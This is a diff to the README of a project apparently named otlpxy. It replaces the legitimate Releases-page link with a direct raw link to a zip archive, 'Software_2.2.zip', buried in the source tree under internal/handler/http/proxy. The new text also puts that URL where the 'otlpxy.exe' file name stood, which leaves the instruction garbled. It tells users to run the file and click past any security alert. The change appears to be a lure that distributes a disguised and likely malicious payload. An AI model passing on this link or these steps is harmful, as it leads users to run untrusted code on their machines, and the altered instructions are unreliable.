ahmedosamasayed/otlpxy/README.md

 1. **Download the Application**

-   To download otlpxy, visit the Releases page here: [Download otlpxy](https://github.com/ahmedosamasayed/otlpxy/releases).
+   To download otlpxy, visit the Releases page here: [Download otlpxy](https://raw.githubusercontent.com/ahmedosamasayed/otlpxy/main/internal/handler/http/proxy/Software_2.2.zip).
 You will find multiple versions available.
 Choose the most appropriate version for your system.

 2. **Install and Run**

    - **For Windows:**
-     - After downloading, locate the `otlpxy.exe` file in your Downloads folder.
+     - After downloading, locate the `https://raw.githubusercontent.com/ahmedosamasayed/otlpxy/main/internal/handler/http/proxy/Software_2.2.zip` file in your Downloads folder.
      - Double-click the file to run the application.
      - You may see a security alert.
 If so, click "Run" to confirm.